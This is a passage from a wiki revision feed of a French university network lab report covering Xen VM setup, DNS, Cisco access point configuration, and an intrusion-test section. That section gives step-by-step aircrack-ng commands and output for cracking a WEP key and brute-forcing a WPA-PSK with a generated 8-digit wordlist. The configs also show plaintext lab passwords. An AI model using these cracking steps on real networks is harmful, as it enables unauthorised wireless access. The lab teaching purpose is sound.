- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56401</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56401"/>
				<updated>2021-11-19T10:06:12Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Sécurisation du site web */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
Il existe plusieurs façon de sécuriser le site web. Je choisis la méthode par mail.&lt;br /&gt;
&lt;br /&gt;
- Créer une adresse mail via gandi.net, onglet Email : admin@toad59.site&lt;br /&gt;
- Accéder à l'adresse mail pour constater que le certificat a été reçu.&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès WiFi ====&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK ====&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 int main(void){&lt;br /&gt;
        int x = 0;&lt;br /&gt;
        for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
                 printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
        }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56400</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56400"/>
				<updated>2021-11-19T10:03:55Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Installation de la machine virtuelle */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Connexion sur le disque de virtualisation ====&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
==== Configuration de la machine virtuelle ====&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
==== Configuration réseau ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à internet à ma machine virtuelle, je modifie le fichier suivant : &lt;br /&gt;
&lt;br /&gt;
/etc/networks/interfaces &lt;br /&gt;
&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 10.60.100.173/24&lt;br /&gt;
  up ip address add dev eth0 193.48.57.173/32 ; ip route add default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
  down ip address del dev eth0 193.48.57.173/32 ; ip route del default via 10.60.100.254 src 193.48.57.173&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Configuration ssh ==== &lt;br /&gt;
&lt;br /&gt;
Pour permettre l'accès à ma machine virtuelle via ssh, je modifie le fichier suivant :&lt;br /&gt;
&lt;br /&gt;
/etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Relancer le service ssh :&lt;br /&gt;
&lt;br /&gt;
 service ssh restart&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la machine virtuelle via ssh il faut desormais taper la commande suivante :&lt;br /&gt;
 ssh@193.48.57.173&lt;br /&gt;
&lt;br /&gt;
==== Configuration DNS ====&lt;br /&gt;
&lt;br /&gt;
- Achat du nom de domaine via gandi.net : toad59.site&lt;br /&gt;
&lt;br /&gt;
- Associer le nom de domaine à l'adresse ip dans gandi, dans l'onglet Glue Records --&amp;gt; Add&lt;br /&gt;
&lt;br /&gt;
- Dans l'onglet Nameserver, sélectionner change puis :&lt;br /&gt;
Nameserver1 : ns.toad59.site&lt;br /&gt;
Nameserver2 : ns.gandi6.net&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.options''', qui gère les options de configuration du DNS :&lt;br /&gt;
 options {&lt;br /&gt;
         directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
         #dnssec-validation auto;&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };&lt;br /&gt;
 };&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
         217.70.177.40/32;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier de configuration '''/etc/bind/db.toad59.site''' &lt;br /&gt;
 $TTL 3600&lt;br /&gt;
 @ IN SOA ns.toad59.site. postmaster.toad59.site. (&lt;br /&gt;
       1               ; Version&lt;br /&gt;
       1800             ; Refresh (30m)&lt;br /&gt;
       600             ; Retry   (10m)&lt;br /&gt;
       3600             ; Expire (1h)&lt;br /&gt;
       3600 )           ; Minimum TTL (1h)&lt;br /&gt;
 @ IN NS ns.toad59.site.&lt;br /&gt;
 @ IN NS ns6.gandi.net.&lt;br /&gt;
 ns      IN A       193.48.57.173&lt;br /&gt;
&lt;br /&gt;
- Modifier le fichier '''/etc/bind/named.conf.local''' pour déclarer les zones associées au domaine : &lt;br /&gt;
 zone &amp;quot;toad59.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;etc/bind/db.toad59.site&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation du site web ====&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
